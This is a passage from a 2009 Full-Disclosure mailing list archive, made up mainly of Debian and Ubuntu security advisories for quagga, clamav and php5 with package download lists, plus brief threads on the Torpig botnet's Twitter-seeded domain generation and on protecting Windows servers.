7b74e82b61c5d893090d2ed2086104a6 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7-gtk_0.2.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 23020 65e66a2944b5d0e0837d1a4c23e06ff6 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 190446 2882b245d28ea23d20e25fad7b0757e1 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-bin_0.2.8.4-6ubuntu1.1_sparc.deb Size/MD5: 18302 5abf22e780e2c61d4c9e0ad14b0f9673 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf-dev_0.2.8.4-6ubuntu1.1_sparc.deb Size/MD5: 201282 e2933a793e52b2e4e70dff1b8c8d5cdb http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7-gtk_0.2.8.4-6ubuntu1.1_sparc.deb Size/MD5: 20586 170e140a012c02e8558cc0af5f240210 http://ports.ubuntu.com/pool/main/libw/libwmf/libwmf0.2-7_0.2.8.4-6ubuntu1.1_sparc.deb Size/MD5: 173658 1eff93e12e2af48c8b2c38507c22371a -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090504/a936f920/attachment.bin From tbiehn at gmail.com Mon May 4 19:23:38 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 4 May 2009 14:23:38 -0400 Subject: [Full-disclosure] Big up to torpig authors Message-ID: <2d6724810905041123o54eea71dyd10f418b35692504@mail.gmail.com> "A recent update to this algorithm is particularly interesting. Similarly to the previous version, the new algorithm uses the current date to generate the drive-by-download domain. However, the new algorithm also relies on search trends from Twitter to generate one additional seed byte." http://www.cs.ucsb.edu/~seclab/projects/torpig/index.html From fw at deneb.enyo.de Mon May 4 21:19:03 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Mon, 04 May 2009 22:19:03 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1787-1] New quagga packages fix denial of service Message-ID: <8763ggk4eg.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1788-1 security at debian.org http://www.debian.org/security/ Florian Weimer May 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : quagga Vulnerability : improper assertion Problem type : remote Debian-specific: no Debian Bug : 526311 It was discovered that Quagga, an IP routing daemon, could no longer process the Internet routing table due to broken handling of multiple 4-byte AS numbers in an AS path. If such a prefix is received, the BGP daemon crashes with an assert failure, leading to a denial of service. The old stable distribution (etch) is not affected by this issue. For the stable distribution (lenny), this problem has been fixed in version 0.99.10-1lenny2. For the unstable distribution (sid), this problem has been fixed in version 0.99.11-2. We recommend that you upgrade your quagga package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10.orig.tar.gz Size/MD5 checksum: 2424191 c7a2d92e1c42214afef9b2e1cd4b5d06 http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2.diff.gz Size/MD5 checksum: 40070 b72e19ed913b32923cf4ef293c67f71c http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2.dsc Size/MD5 checksum: 1651 a8ef80d57fd5a5a5b08c7ccc70e6a179 Architecture independent packages: http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.99.10-1lenny2_all.deb Size/MD5 checksum: 661226 720947423143cb35eb5c26a0d420066b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_alpha.deb Size/MD5 checksum: 1902736 570becd04ecb3dd8a0581010884928df amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_amd64.deb Size/MD5 checksum: 1748838 f3fcd731d119c422463c36bb4f08be1a arm architecture (ARM) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_arm.deb Size/MD5 checksum: 1449222 6b654e2d4e1a4f00169309ebbbd3dbf9 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_hppa.deb Size/MD5 checksum: 1681872 8894106d57df0a3d92bb84f148150c2d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_i386.deb Size/MD5 checksum: 1606310 80046937a2da8a949a8167f753a583ce mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_mipsel.deb Size/MD5 checksum: 1600660 716f61415932929c2f668f99faea448e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_powerpc.deb Size/MD5 checksum: 1715848 995194031d563994b7d77018d8a4ca3e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_s390.deb Size/MD5 checksum: 1794568 b1b47e8dae153461f73c98a61c653e1e sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_sparc.deb Size/MD5 checksum: 1670342 18f98f0978f510ac18636ca1ccc9dfe7 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJ/08zAAoJEL97/wQC1SS+0U4H/ArnEIvYBJjOsUJ/nKZ8q/Vw sAGVI8TJjbrjuE/28vFyiJbT4qb977i9W4lgHiCtpCSaKo3YermLUZ+NSFxP280n czPtpIcq2lmOwdasq5xueH57cYztP9MdWTKlts79rfDjlK6T5o7dO9bN5iCKsgW9 GCC2ZeJqdY20NTtoSz8OHb9DLljnrvXxPtwv5Z7UPBaHvamvH41oxKLpdE1u274Y xt5XJ5xiqqxKWxRHNYk0sINTqOiR0eHDIEXwUBM7XOu4GL1CIK7kz4/V+b8H+y+3 g8bxPXFVOcG6KTglwwsUf2utOuFKyrBryXUcwW1ZsF2BGVDuS8LoAaACpuO6mII= =Eb+C -----END PGP SIGNATURE----- From jamie at canonical.com Tue May 5 00:06:29 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Mon, 4 May 2009 18:06:29 -0500 Subject: [Full-disclosure] [USN-770-1] ClamAV vulnerability Message-ID: <20090504230629.GF30107@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-770-1 May 04, 2009 clamav vulnerability https://launchpad.net/bugs/365823 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: clamav-milter 0.95.1+dfsg-1ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A flaw was discovered in the clamav-milter initscript which caused the ownership of the current working directory to be changed to the 'clamav' user. This update attempts to repair the incorrect ownership for standard system directories, but it is recommended that the following command be performed to report any other directories that may be affected: $ sudo find -H / -type d -user clamav \! -group clamav 2>/dev/null Systems configured to run clamav as a user other than the default 'clamav' user will need to adjust the above command accordingly. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2.diff.gz Size/MD5: 240956 16d828dea428d031cc59d41b24b592d1 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2.dsc Size/MD5: 1540 575dace049ba5216b8ccbd3333b6c2c3 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.1+dfsg.orig.tar.gz Size/MD5: 24233062 1e9618ac1b9b58e5c1c1b665adf26749 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.95.1+dfsg-1ubuntu1.2_all.deb Size/MD5: 21399900 52b7926a51ada72067819f1c646db8b3 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.95.1+dfsg-1ubuntu1.2_all.deb Size/MD5: 1110124 f7759ab6a73007be3605276cb0e7f28d http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.95.1+dfsg-1ubuntu1.2_all.deb Size/MD5: 225956 d4cc917a76574e27fe7b51643628bb4d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 393938 b905639abb64cbb62f6b088abf5a0231 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 1184152 675a9cea68762ac8e0dca483292e15cf http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 281792 d0cbd33bd85b022ee85bbdac7511213f http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 273934 86fa7c88dd44a77cf563b401d22a1139 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 605768 951853d338127eb686432233bfb5a341 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 569884 20ce2a8275351db1eee604558d79d4f7 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.1+dfsg-1ubuntu1.2_amd64.deb Size/MD5: 266000 33d736985619ca166f8f917fb7271d87 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 382140 4440322bc961f0a410ebc92bb95f17aa http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 1095416 9e2b92403f60728922113a3a27982533 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 279266 5f2fe7d3e0d045fe4f68e356fd977a04 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 268354 db1afab9a4b57a37bdcc3ccf471c5cc2 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 574290 c33b885b054cd55655292c55bed96295 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 557328 643fd52c2f12ac522a87121e93978e79 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.1+dfsg-1ubuntu1.2_i386.deb Size/MD5: 263040 0ab591f0b668adb5587edd485e987c13 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 382392 0ea691eea8bd953bc273da4c9b9debc4 http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 1116512 52c01ee04b0107669c566b44cfac727e http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 279020 aa4872b8c2d9f299d532888d3675ea51 http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 268124 3a3175eb60cea6248bdd6767e5833de2 http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 575506 96c1ca9f26aba0862f42b189fcae7354 http://ports.ubuntu.com/pool/main/c/clamav/libclamav6_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 559374 04a449e526bbb7d8be9b95c365b3b7f6 http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.95.1+dfsg-1ubuntu1.2_lpia.deb Size/MD5: 263008 ef2bcc6eb89e665ab5fba4cf10d2d2d8 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 400204 94578b9dca844d1434025a51c0109c83 http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 1158670 5a7be46133af1bc18e47adfca1cf6587 http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 283848 2ab5a37504e844051c48c6419e55f336 http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 276786 1003a47361604f8d3b54771e9bb0fa34 http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 645340 365e906bfacae713aa391e827933e9ad http://ports.ubuntu.com/pool/main/c/clamav/libclamav6_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 587074 d83bab7ca42ef3a0b37e704aa624558c http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.95.1+dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 269430 29c2c9c54774130407c28ed4422da83b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 383556 1cea55a1fce839b2ca1e5b03ca632c32 http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 1064340 a6c0dc3a0e3d40a4f89dff2290a6769a http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 277894 fc8f08a7d044cc9246a8233d1a9cfd2a http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 268476 c4a9a06151ad123de3cb484f06fc8870 http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 607604 f11ab004f8c8c5c6845bc90c38cf2f4a http://ports.ubuntu.com/pool/main/c/clamav/libclamav6_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 574486 e1c8f67fa7300c4759d9c01b9bc4e3c2 http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.95.1+dfsg-1ubuntu1.2_sparc.deb Size/MD5: 262718 ff8884c64206061ec9830b029c06aa8e -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090504/ffb8cb93/attachment.bin From tbiehn at gmail.com Tue May 5 03:51:09 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 4 May 2009 22:51:09 -0400 Subject: [Full-disclosure] Full-disclosure Anti virus installations on Windows servers In-Reply-To: <49FEEA6B.6030803@mistrealm.com> References: <2d6724810904291229k2990e62al94cdd95f6ee040b7@mail.gmail.com> <20090501142903.BBD.0@paddy.troja.mff.cuni.cz> <2d6724810905011052o2259e313q75c06d84ac14015a@mail.gmail.com> <49FEEA6B.6030803@mistrealm.com> Message-ID: <2d6724810905041951w9b72d81ud07c015f5c20217e@mail.gmail.com> What are you trying to protect against? This is of value for targeting 'advice.' As a server you should be most worried about people popping your box, now you can eliminate 99.9% of attackers by following a regular patch schedule. The other .1 is made up of .05 target and .05 known & unpatched. .1 might be skewed one way or the other depending on your value as a target, but I think you get the point. A/V is worthless in most targeted attacks, the only worthwhile a/v in these are those that have good heuristic analysis and/or prevent against rootkits. Their value is dubious at best. In this case (and why i suggested it in the first place) something like eEye Blink is the only TYPE OF beneficial product you can get. It logically analyzes whatever protocols it understands and looks for 'out of bound' type patterns. Has a library of known shellcode that it matches against. Claims to prevent rootkit / exploits via some API hooking voodoo, and a bunch of other bull you can only get from reading the marketing boilerplate on their homepage. As with *nix / BSD you're only as good as your sysadmin, you should read through the various security settings you have available. Maybe you want to read NSA's secure XP scripts? Try to implement a solid EFS policy on your windows box to enforce read permissions against SYSTEM and other admin accounts, this will reduce any damage possible from a compromised box (however you cannot trust the security of EFS if there's any attacker on your OS w/ admin privs because they have access to your memory bits). Check this wacky scenario: Set up nix inside a VM running inside your windows server. Use the nix box as a reverse proxy to your windows box. This should give you some lead time, and will piss off (once they get to the container OS)\scare off(holy shit it's a vmware honeypot) whomever is attacking you. The absolute worst thing you can do is ask a bunch of people on FD what to do. -Travis On Mon, May 4, 2009 at 9:15 AM, mbs wrote: > This debate has been interesting, if light on practical advice. > > Let me clarify my question. > > First, I do not own the server in question. I did not install the operating > system in question. I did not make that business decision. > > According to http://news.netcraft.com/ > > Apache 104,178,852 46.35% 106,368,727 45.95% -0.41 > Microsoft 66,229,250 29.47% 67,767,928 29.27% -0.20 > Thirty percent of servers run windows. > > Some of you will laugh at someone who has to protect a windows server, and > would suggest rebuilding from the ground up. Obviously my client would > disagree. > > One person suggested Kaspersky, and I have it running at the moment, it > seems to be working as intended. > > Am I missing the point? > > > > T Biehn wrote: > > The example provides an easy to concoct scenario where perhaps > anti-virus software might be employed to great benefit where the > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From nlidzborski at qualys.com Tue May 5 04:20:11 2009 From: nlidzborski at qualys.com (Nicolas Lidzborski) Date: Mon, 4 May 2009 20:20:11 -0700 Subject: [Full-disclosure] [SECURITY] [DSA 1787-1] New quagga packages fixdenial of service Message-ID: <7B8781C083636843B71E6275E4B229BA0CEF6616@mail1.corp.qualys.com> -- Nicolas Lidzborski Sr. Security Engineer Qualys, Inc. ----- Original Message ----- From: full-disclosure-bounces at lists.grok.org.uk To: debian-security-announce at lists.debian.org Sent: Mon May 04 13:19:03 2009 Subject: [Full-disclosure] [SECURITY] [DSA 1787-1] New quagga packages fixdenial of service -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1788-1 security at debian.org http://www.debian.org/security/ Florian Weimer May 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : quagga Vulnerability : improper assertion Problem type : remote Debian-specific: no Debian Bug : 526311 It was discovered that Quagga, an IP routing daemon, could no longer process the Internet routing table due to broken handling of multiple 4-byte AS numbers in an AS path. If such a prefix is received, the BGP daemon crashes with an assert failure, leading to a denial of service. The old stable distribution (etch) is not affected by this issue. For the stable distribution (lenny), this problem has been fixed in version 0.99.10-1lenny2. For the unstable distribution (sid), this problem has been fixed in version 0.99.11-2. We recommend that you upgrade your quagga package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10.orig.tar.gz Size/MD5 checksum: 2424191 c7a2d92e1c42214afef9b2e1cd4b5d06 http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2.diff.gz Size/MD5 checksum: 40070 b72e19ed913b32923cf4ef293c67f71c http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2.dsc Size/MD5 checksum: 1651 a8ef80d57fd5a5a5b08c7ccc70e6a179 Architecture independent packages: http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.99.10-1lenny2_all.deb Size/MD5 checksum: 661226 720947423143cb35eb5c26a0d420066b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_alpha.deb Size/MD5 checksum: 1902736 570becd04ecb3dd8a0581010884928df amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_amd64.deb Size/MD5 checksum: 1748838 f3fcd731d119c422463c36bb4f08be1a arm architecture (ARM) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_arm.deb Size/MD5 checksum: 1449222 6b654e2d4e1a4f00169309ebbbd3dbf9 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_hppa.deb Size/MD5 checksum: 1681872 8894106d57df0a3d92bb84f148150c2d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_i386.deb Size/MD5 checksum: 1606310 80046937a2da8a949a8167f753a583ce mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_mipsel.deb Size/MD5 checksum: 1600660 716f61415932929c2f668f99faea448e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_powerpc.deb Size/MD5 checksum: 1715848 995194031d563994b7d77018d8a4ca3e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_s390.deb Size/MD5 checksum: 1794568 b1b47e8dae153461f73c98a61c653e1e sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny2_sparc.deb Size/MD5 checksum: 1670342 18f98f0978f510ac18636ca1ccc9dfe7 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJ/08zAAoJEL97/wQC1SS+0U4H/ArnEIvYBJjOsUJ/nKZ8q/Vw sAGVI8TJjbrjuE/28vFyiJbT4qb977i9W4lgHiCtpCSaKo3YermLUZ+NSFxP280n czPtpIcq2lmOwdasq5xueH57cYztP9MdWTKlts79rfDjlK6T5o7dO9bN5iCKsgW9 GCC2ZeJqdY20NTtoSz8OHb9DLljnrvXxPtwv5Z7UPBaHvamvH41oxKLpdE1u274Y xt5XJ5xiqqxKWxRHNYk0sINTqOiR0eHDIEXwUBM7XOu4GL1CIK7kz4/V+b8H+y+3 g8bxPXFVOcG6KTglwwsUf2utOuFKyrBryXUcwW1ZsF2BGVDuS8LoAaACpuO6mII= =Eb+C -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From full-disclosure at lawnjam.com Tue May 5 09:53:10 2009 From: full-disclosure at lawnjam.com (John Lamb) Date: Tue, 5 May 2009 09:53:10 +0100 Subject: [Full-disclosure] Big up to torpig authors In-Reply-To: <2d6724810905041123o54eea71dyd10f418b35692504@mail.gmail.com> References: <2d6724810905041123o54eea71dyd10f418b35692504@mail.gmail.com> Message-ID: <20090505085310.GA17195@olann.net> On Mon, May 04, 2009 at 02:23:38PM -0400, T Biehn wrote: > "A recent update to this algorithm is particularly interesting. > Similarly to the previous version, the new algorithm uses the current > date to generate the drive-by-download domain. However, the new > algorithm also relies on search trends from Twitter to generate one > additional seed byte." > > http://www.cs.ucsb.edu/~seclab/projects/torpig/index.html Unfortunately for them a competing virus has seriously reduced the entropy of their source - "Swine Flu" has been sitting at the top of the list for days now... From thijs at debian.org Mon May 4 21:57:57 2009 From: thijs at debian.org (Thijs Kinkhorst) Date: Mon, 4 May 2009 22:57:57 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1789-1] New php5 packages fix several vulnerabilities Message-ID: <20090504205757.DA5A4326858@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1789-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst May 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : php5 Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-2107 CVE-2008-2108 CVE-2008-5557 CVE-2008-5624 CVE-2008-5658 CVE-2008-5814 CVE-2009-0754 CVE-2009-1271 Debian Bugs : 507101 507857 508021 511493 523028 523049 Several remote vulnerabilities have been discovered in the PHP 5 hypertext preprocessor. The Common Vulnerabilities and Exposures project identifies the following problems. The following four vulnerabilities have already been fixed in the stable (lenny) version of php5 prior to the release of lenny. This update now addresses them for etch (oldstable) aswell: CVE-2008-2107 / CVE-2008-2108 The GENERATE_SEED macro has several problems that make predicting generated random numbers easier, facilitating attacks against measures that use rand() or mt_rand() as part of a protection. CVE-2008-5557 A buffer overflow in the mbstring extension allows attackers to execute arbitrary code via a crafted string containing an HTML entity. CVE-2008-5624 The page_uid and page_gid variables are not correctly set, allowing use of some functionality intended to be restricted to root. CVE-2008-5658 Directory traversal vulnerability in the ZipArchive::extractTo function allows attackers to write arbitrary files via a ZIP file with a file whose name contains .. (dot dot) sequences. This update also addresses the following three vulnerabilities for both oldstable (etch) and stable (lenny): CVE-2008-5814 Cross-site scripting (XSS) vulnerability, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML. CVE-2009-0754 When running on Apache, PHP allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server. CVE-2009-1271 The JSON_parser function allows a denial of service (segmentation fault) via a malformed string to the json_decode API function. Furthermore, two updates originally scheduled for the next point update for oldstable are included in the etch package: * Let PHP use the system timezone database instead of the embedded timezone database which is out of date. * From the source tarball, the unused 'dbase' module has been removed which contained licensing problems. For the old stable distribution (etch), these problems have been fixed in version 5.2.0+dfsg-8+etch15. For the stable distribution (lenny), these problems have been fixed in version 5.2.6.dfsg.1-1+lenny3. For the unstable distribution (sid), these problems have been fixed in version 5.2.9.dfsg.1-1. We recommend that you upgrade your php5 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15.diff.gz Size/MD5 checksum: 130902 27d7683a1388c69479b06ac1162e27a2 http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15.dsc Size/MD5 checksum: 1993 68d631a7860f0fc34516cc8bbf2938a5 http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg.orig.tar.gz Size/MD5 checksum: 8431973 956486a588c577616a5008d185e84968 Architecture independent packages: http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15_all.deb Size/MD5 checksum: 1044 a6e0b8f0547c74c498749d28dac8b92f http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0+dfsg-8+etch15_all.deb Size/MD5 checksum: 312534 c5fb5dc9ccfe7dfaabce6c5f6f289549 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 5312 f2543060aaf1a8cb00a142d77c7d727f http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 55670 96ebda392780698ae80441a9021c8b4a http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 221226 9af42f2646efbe5c43482e9333e17bff http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 38922 8a9111577f3ea3021ea6e5d6b2021306 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 2487846 c371adc12b1ff1297a3b1dde1294eca3 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 70954 9f948ebf6a836d954a713f194703db84 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 4789370 31123ee20c392c73aeb5927077457e5c http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 